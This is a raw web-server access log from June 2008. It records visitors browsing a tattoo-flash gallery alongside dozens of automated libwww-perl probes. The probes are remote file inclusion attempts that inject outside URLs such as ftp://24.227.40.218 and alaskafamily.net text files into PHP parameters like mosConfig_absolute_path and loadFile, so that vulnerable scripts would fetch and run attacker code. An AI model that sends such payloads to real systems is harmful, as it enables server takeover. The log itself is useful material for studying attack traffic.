72.29.73.67 - - [25/Jun/2008:19:00:30 -0500] "GET /logs/db.php?path_local=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 295 "-""libwww-perl/5.810"
72.29.73.67 - - [25/Jun/2008:19:00:30 -0500] "GET /db.php?path_local=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 290 "-""libwww-perl/5.810"
81.169.139.117 - - [25/Jun/2008:19:00:53 -0500] "GET //sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.friendsofnarconon.org/modules/is/Osryid.txt??? HTTP/1.1" 404 353 "-""libwww-perl/5.803"
81.169.139.117 - - [25/Jun/2008:19:00:53 -0500] "GET /logs//sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.friendsofnarconon.org/modules/is/Osryid.txt??? HTTP/1.1" 404 358 "-""libwww-perl/5.803"
217.115.144.54 - - [25/Jun/2008:19:03:11 -0500] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://alaskafamily.net/poll/me.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
217.115.144.54 - - [25/Jun/2008:19:03:12 -0500] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://alaskafamily.net/poll/me.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
83.222.27.201 - - [25/Jun/2008:19:04:10 -0500] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://alaskafamily.net/poll/me.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
83.222.27.201 - - [25/Jun/2008:19:04:11 -0500] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://alaskafamily.net/poll/me.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
72.29.75.39 - - [25/Jun/2008:19:05:17 -0500] "GET /logs//login.php?dir=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 299 "-""libwww-perl/5.810"
72.29.75.39 - - [25/Jun/2008:19:05:18 -0500] "GET //login.php?dir=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 294 "-""libwww-perl/5.810"
72.29.75.39 - - [25/Jun/2008:19:05:19 -0500] "GET /logs//login.php?dir=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 299 "-""libwww-perl/5.810"
72.29.75.39 - - [25/Jun/2008:19:05:19 -0500] "GET //login.php?dir=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 294 "-""libwww-perl/5.810"
217.115.144.54 - - [25/Jun/2008:19:07:30 -0500] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://alaskafamily.net/poll/me.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
217.115.144.54 - - [25/Jun/2008:19:07:30 -0500] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://alaskafamily.net/poll/me.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
83.222.27.201 - - [25/Jun/2008:19:10:10 -0500] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://alaskafamily.net/poll/me.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
83.222.27.201 - - [25/Jun/2008:19:10:10 -0500] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://alaskafamily.net/poll/me.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
217.148.95.147 - - [25/Jun/2008:19:14:45 -0500] "GET /logs//mcf.php?content=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 297 "-""libwww-perl/5.76"
217.148.95.147 - - [25/Jun/2008:19:14:45 -0500] "GET //mcf.php?content=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 292 "-""libwww-perl/5.76"
72.29.73.67 - - [25/Jun/2008:19:15:15 -0500] "GET /logs//mcf.php?content=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 297 "-""libwww-perl/5.810"
72.29.73.67 - - [25/Jun/2008:19:15:16 -0500] "GET //mcf.php?content=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 292 "-""libwww-perl/5.810"
72.29.75.39 - - [25/Jun/2008:19:15:18 -0500] "GET /logs//mcf.php?content=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 297 "-""libwww-perl/5.810"
72.29.75.39 - - [25/Jun/2008:19:15:18 -0500] "GET //mcf.php?content=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 292 "-""libwww-perl/5.810"
72.29.75.39 - - [25/Jun/2008:19:15:20 -0500] "GET /logs//mcf.php?content=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 297 "-""libwww-perl/5.810"
72.29.75.39 - - [25/Jun/2008:19:15:20 -0500] "GET //mcf.php?content=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 292 "-""libwww-perl/5.810"
217.115.144.54 - - [25/Jun/2008:19:16:06 -0500] "GET /logs/phphtml.php?htmlclass_path=http://alaskafamily.net/poll/me.txt?? HTTP/1.1" 404 300 "-""libwww-perl/5.79"
217.115.144.54 - - [25/Jun/2008:19:16:06 -0500] "GET /phphtml.php?htmlclass_path=http://alaskafamily.net/poll/me.txt?? HTTP/1.1" 404 295 "-""libwww-perl/5.79"
74.6.8.113 - - [25/Jun/2008:19:17:49 -0500] "GET /robots.txt HTTP/1.0" 404 282 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.8.113 - - [25/Jun/2008:19:17:50 -0500] "GET /logs/access_log.1176076800 HTTP/1.0" 200 228740 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
203.72.181.15 - - [25/Jun/2008:19:18:38 -0500] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://ieras.ru/tmp/mid.txt? HTTP/1.1" 404 325 "-""libwww-perl/5.65"
203.72.181.15 - - [25/Jun/2008:19:18:39 -0500] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://ieras.ru/tmp/mid.txt? HTTP/1.1" 404 320 "-""libwww-perl/5.65"
72.29.73.67 - - [25/Jun/2008:19:19:15 -0500] "GET /logs//login.php?dir=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 299 "-""libwww-perl/5.810"
72.29.73.67 - - [25/Jun/2008:19:19:15 -0500] "GET //login.php?dir=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 294 "-""libwww-perl/5.810"
217.148.95.147 - - [25/Jun/2008:19:19:19 -0500] "GET /logs//login.php?dir=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 299 "-""libwww-perl/5.76"
217.148.95.147 - - [25/Jun/2008:19:19:19 -0500] "GET //login.php?dir=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 294 "-""libwww-perl/5.76"
87.106.18.76 - - [25/Jun/2008:19:21:50 -0500] "GET /logs/db.php?path_local=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 295 "-""libwww-perl/5.805"
87.106.18.76 - - [25/Jun/2008:19:21:56 -0500] "GET /logs/db.php?path_local=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 295 "-""libwww-perl/5.805"
87.106.18.76 - - [25/Jun/2008:19:22:01 -0500] "GET /db.php?path_local=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 290 "-""libwww-perl/5.805"
87.106.18.76 - - [25/Jun/2008:19:22:06 -0500] "GET /db.php?path_local=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 290 "-""libwww-perl/5.805"
200.11.67.242 - - [25/Jun/2008:19:22:56 -0500] "GET /logs/phphtml.php?htmlclass_path=http://alaskafamily.net/poll/me.txt??? HTTP/1.1" 404 300 "-""libwww-perl/5.65"
200.11.67.242 - - [25/Jun/2008:19:22:57 -0500] "GET /phphtml.php?htmlclass_path=http://alaskafamily.net/poll/me.txt??? HTTP/1.1" 404 295 "-""libwww-perl/5.65"
217.167.194.105 - - [25/Jun/2008:19:27:07 -0500] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://alaskafamily.net/poll/me.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.803"
217.167.194.105 - - [25/Jun/2008:19:27:08 -0500] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://alaskafamily.net/poll/me.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.803"
217.167.194.105 - - [25/Jun/2008:19:28:29 -0500] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://alaskafamily.net/poll/me.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.803"
217.167.194.105 - - [25/Jun/2008:19:28:30 -0500] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://alaskafamily.net/poll/me.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.803"
81.192.48.40 - - [25/Jun/2008:19:30:18 -0500] "GET //include/write.php?dir=http://alaskafamily.net/poll/me.txt?? HTTP/1.1" 404 302 "-""libwww-perl/5.805"
69.93.48.162 - - [25/Jun/2008:19:34:07 -0500] "GET /logs/components/com_mp3_allopass/allopass.php?mosConfig_live_site=ftp://24.227.40.218/temp/trem/old? HTTP/1.1" 404 329 "-""libwww-perl/5.69"
69.93.48.162 - - [25/Jun/2008:19:34:07 -0500] "GET /logs/components/com_mp3_allopass/allopass.php?mosConfig_live_site=ftp://24.227.40.218/temp/trem/1? HTTP/1.1" 404 329 "-""libwww-perl/5.69"
69.93.48.162 - - [25/Jun/2008:19:34:07 -0500] "GET /components/com_mp3_allopass/allopass.php?mosConfig_live_site=ftp://24.227.40.218/temp/trem/old? HTTP/1.1" 404 324 "-""libwww-perl/5.69"
69.93.48.162 - - [25/Jun/2008:19:34:08 -0500] "GET /components/com_mp3_allopass/allopass.php?mosConfig_live_site=ftp://24.227.40.218/temp/trem/1? HTTP/1.1" 404 324 "-""libwww-perl/5.69"
212.241.213.183 - - [25/Jun/2008:19:35:36 -0500] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://francealacarte.net/templates/sida6_4.gif????????????????????????????? HTTP/1.1" 404 348 "-""libwww-perl/5.803"
212.241.213.183 - - [25/Jun/2008:19:35:36 -0500] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://francealacarte.net/templates/sida6_4.gif????????????????????????????? HTTP/1.1" 404 343 "-""libwww-perl/5.803"
66.249.73.43 - - [25/Jun/2008:19:39:09 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 3776 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
83.222.27.201 - - [25/Jun/2008:19:39:37 -0500] "GET /logs//config/dbutil.bck.php?confdir=http://alaskafamily.net/poll/me.txt?? HTTP/1.1" 404 311 "-""libwww-perl/5.805"
83.222.27.201 - - [25/Jun/2008:19:39:37 -0500] "GET //config/dbutil.bck.php?confdir=http://alaskafamily.net/poll/me.txt?? HTTP/1.1" 404 306 "-""libwww-perl/5.805"
82.194.73.130 - - [25/Jun/2008:19:43:08 -0500] "GET /logs/sql.php?classes_dir=http://www.proyectoindra.com/borda2.jpg? HTTP/1.1" 404 296 "-""libwww-perl/5.811"
82.194.73.130 - - [25/Jun/2008:19:43:08 -0500] "GET /sql.php?classes_dir=http://www.proyectoindra.com/borda2.jpg? HTTP/1.1" 404 291 "-""libwww-perl/5.811"
200.11.67.242 - - [25/Jun/2008:19:47:24 -0500] "GET /logs//config/dbutil.bck.php?confdir=http://alaskafamily.net/poll/me.txt??? HTTP/1.1" 404 311 "-""libwww-perl/5.65"
200.11.67.242 - - [25/Jun/2008:19:47:24 -0500] "GET //config/dbutil.bck.php?confdir=http://alaskafamily.net/poll/me.txt??? HTTP/1.1" 404 306 "-""libwww-perl/5.65"
200.11.67.242 - - [25/Jun/2008:19:47:38 -0500] "GET /logs//config/dbutil.bck.php?confdir=http://alaskafamily.net/poll/id.txt?? HTTP/1.1" 404 311 "-""libwww-perl/5.65"
200.11.67.242 - - [25/Jun/2008:19:47:38 -0500] "GET //config/dbutil.bck.php?confdir=http://alaskafamily.net/poll/id.txt?? HTTP/1.1" 404 306 "-""libwww-perl/5.65"
83.222.27.201 - - [25/Jun/2008:19:48:49 -0500] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://alaskafamily.net/poll/me.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
83.222.27.201 - - [25/Jun/2008:19:48:49 -0500] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://alaskafamily.net/poll/me.txt?? HTTP/1.1" 404 316 "-""libwww-perl/5.805"
71.205.124.170 - - [25/Jun/2008:19:49:19 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
71.205.124.170 - - [25/Jun/2008:19:49:19 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 3776 "http://en.wikipedia.org/wiki/Flash_%28tattoo%29""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
71.205.124.170 - - [25/Jun/2008:19:49:19 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
71.205.124.170 - - [25/Jun/2008:19:49:19 -0500] "GET /tattoo/webring.jpg HTTP/1.1" 200 13114 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
71.205.124.170 - - [25/Jun/2008:19:51:42 -0500] "GET /tattoo/tatsymbl.htm HTTP/1.1" 200 3085 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
82.194.73.130 - - [25/Jun/2008:19:52:33 -0500] "GET /logs/sql.php?classes_dir=http://www.proyectoindra.com/borda2.jpg? HTTP/1.1" 404 296 "-""libwww-perl/5.811"
82.194.73.130 - - [25/Jun/2008:19:52:33 -0500] "GET /sql.php?classes_dir=http://www.proyectoindra.com/borda2.jpg? HTTP/1.1" 404 291 "-""libwww-perl/5.811"
83.222.27.201 - - [25/Jun/2008:19:52:39 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://alaskafamily.net/poll/me.txt?? HTTP/1.1" 404 314 "-""libwww-perl/5.805"
83.222.27.201 - - [25/Jun/2008:19:52:40 -0500] "GET //skin/zero_vote/error.php?dir=http://alaskafamily.net/poll/me.txt?? HTTP/1.1" 404 309 "-""libwww-perl/5.805"
200.11.67.242 - - [25/Jun/2008:19:53:37 -0500] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://alaskafamily.net/poll/me.txt??? HTTP/1.1" 404 321 "-""libwww-perl/5.65"
200.11.67.242 - - [25/Jun/2008:19:53:38 -0500] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://alaskafamily.net/poll/me.txt??? HTTP/1.1" 404 316 "-""libwww-perl/5.65"
82.194.73.130 - - [25/Jun/2008:19:57:06 -0500] "GET /logs/sql.php?classes_dir=http://www.proyectoindra.com/borda2.jpg? HTTP/1.1" 404 296 "-""libwww-perl/5.811"
82.194.73.130 - - [25/Jun/2008:19:57:06 -0500] "GET /sql.php?classes_dir=http://www.proyectoindra.com/borda2.jpg? HTTP/1.1" 404 291 "-""libwww-perl/5.811"
74.6.8.113 - - [25/Jun/2008:19:58:17 -0500] "GET /logs/access_log.1193788800 HTTP/1.0" 200 236887 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
201.55.48.7 - - [25/Jun/2008:20:01:53 -0500] "GET /logs/errors.php?error=http://rehab.ru/images/stories/ooid.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
201.55.48.7 - - [25/Jun/2008:20:01:53 -0500] "GET /logs/errors.php?error=http://rehab.ru/images/stories/ooid.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
201.55.48.7 - - [25/Jun/2008:20:01:53 -0500] "GET /errors.php?error=http://rehab.ru/images/stories/ooid.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
201.55.48.7 - - [25/Jun/2008:20:01:53 -0500] "GET /errors.php?error=http://rehab.ru/images/stories/ooid.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
193.252.149.15 - - [25/Jun/2008:20:03:27 -0500] "GET / HTTP/1.1" 200 1243 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1) VoilaBot BETA 1.2 (support.voilabot@orange-ftgroup.com)"
76.25.130.57 - - [25/Jun/2008:20:04:01 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 3776 "http://search.msn.com/results.aspx?q=vintage+tatto&FORM=MSNH""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; NET_mmhpset)"
76.25.130.57 - - [25/Jun/2008:20:04:01 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; NET_mmhpset)"
76.25.130.57 - - [25/Jun/2008:20:04:02 -0500] "GET /tattoo/webring.jpg HTTP/1.1" 200 13114 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; NET_mmhpset)"
76.25.130.57 - - [25/Jun/2008:20:04:02 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; NET_mmhpset)"
76.25.130.57 - - [25/Jun/2008:20:04:06 -0500] "GET /tattoo/set1.htm HTTP/1.1" 200 2676 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; NET_mmhpset)"
76.25.130.57 - - [25/Jun/2008:20:04:06 -0500] "GET /tattoo/tat10.JPG HTTP/1.1" 200 22746 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; NET_mmhpset)"
76.25.130.57 - - [25/Jun/2008:20:04:06 -0500] "GET /tattoo/tat1.JPG HTTP/1.1" 200 16158 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; NET_mmhpset)"
76.25.130.57 - - [25/Jun/2008:20:04:06 -0500] "GET /tattoo/tat2.JPG HTTP/1.1" 200 18943 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; NET_mmhpset)"
76.25.130.57 - - [25/Jun/2008:20:04:06 -0500] "GET /tattoo/tat4.JPG HTTP/1.1" 200 18080 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; NET_mmhpset)"
76.25.130.57 - - [25/Jun/2008:20:04:06 -0500] "GET /tattoo/tat5.JPG HTTP/1.1" 200 13769 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; NET_mmhpset)"
76.25.130.57 - - [25/Jun/2008:20:04:06 -0500] "GET /tattoo/tat3.jpg HTTP/1.1" 200 11901 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; NET_mmhpset)"
76.25.130.57 - - [25/Jun/2008:20:04:07 -0500] "GET /tattoo/tat6.JPG HTTP/1.1" 200 18543 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; NET_mmhpset)"
76.25.130.57 - - [25/Jun/2008:20:04:07 -0500] "GET /tattoo/tat8.jpg HTTP/1.1" 200 13191 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; NET_mmhpset)"
76.25.130.57 - - [25/Jun/2008:20:04:07 -0500] "GET /tattoo/tat7.JPG HTTP/1.1" 200 17358 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; NET_mmhpset)"
76.25.130.57 - - [25/Jun/2008:20:04:07 -0500] "GET /tattoo/tat9.JPG HTTP/1.1" 200 16749 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; NET_mmhpset)"
76.25.130.57 - - [25/Jun/2008:20:04:31 -0500] "GET /tattoo/set2.htm HTTP/1.1" 200 2378 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; NET_mmhpset)"
76.25.130.57 - - [25/Jun/2008:20:04:31 -0500] "GET /tattoo/tatb10.JPG HTTP/1.1" 200 17887 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; NET_mmhpset)"
76.25.130.57 - - [25/Jun/2008:20:04:31 -0500] "GET /tattoo/tatb2.JPG HTTP/1.1" 200 16592 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; NET_mmhpset)"
76.25.130.57 - - [25/Jun/2008:20:04:32 -0500] "GET /tattoo/tatb3.JPG HTTP/1.1" 200 16163 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; NET_mmhpset)"
76.25.130.57 - - [25/Jun/2008:20:04:32 -0500] "GET /tattoo/tatb4.JPG HTTP/1.1" 200 15705 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; NET_mmhpset)"
76.25.130.57 - - [25/Jun/2008:20:04:32 -0500] "GET /tattoo/tatb5.JPG HTTP/1.1" 200 20135 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; NET_mmhpset)"
76.25.130.57 - - [25/Jun/2008:20:04:32 -0500] "GET /tattoo/tatb6.JPG HTTP/1.1" 200 21190 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; NET_mmhpset)"
76.25.130.57 - - [25/Jun/2008:20:04:32 -0500] "GET /tattoo/tatb7.JPG HTTP/1.1" 200 16193 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; NET_mmhpset)"
76.25.130.57 - - [25/Jun/2008:20:04:32 -0500] "GET /tattoo/tatb8.JPG HTTP/1.1" 200 18467 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; NET_mmhpset)"
76.25.130.57 - - [25/Jun/2008:20:04:32 -0500] "GET /tattoo/tatb9.JPG HTTP/1.1" 200 21598 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; NET_mmhpset)"
76.25.130.57 - - [25/Jun/2008:20:04:32 -0500] "GET /tattoo/tatb1.JPG HTTP/1.1" 200 14848 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; NET_mmhpset)"
76.25.130.57 - - [25/Jun/2008:20:04:52 -0500] "GET /tattoo/set3.htm HTTP/1.1" 200 2177 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; NET_mmhpset)"
76.25.130.57 - - [25/Jun/2008:20:04:53 -0500] "GET /tattoo/tatc1.JPG HTTP/1.1" 200 21412 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; NET_mmhpset)"
76.25.130.57 - - [25/Jun/2008:20:04:53 -0500] "GET /tattoo/tatc10.JPG HTTP/1.1" 200 14157 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; NET_mmhpset)"
76.25.130.57 - - [25/Jun/2008:20:04:53 -0500] "GET /tattoo/tatc2.JPG HTTP/1.1" 200 17893 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; NET_mmhpset)"
76.25.130.57 - - [25/Jun/2008:20:04:53 -0500] "GET /tattoo/tatc3.JPG HTTP/1.1" 200 16313 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; NET_mmhpset)"
76.25.130.57 - - [25/Jun/2008:20:04:53 -0500] "GET /tattoo/tatc4.JPG HTTP/1.1" 200 12619 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; NET_mmhpset)"
76.25.130.57 - - [25/Jun/2008:20:04:53 -0500] "GET /tattoo/tatc8.JPG HTTP/1.1" 200 17057 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; NET_mmhpset)"
76.25.130.57 - - [25/Jun/2008:20:04:53 -0500] "GET /tattoo/tatc6.JPG HTTP/1.1" 200 14549 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; NET_mmhpset)"
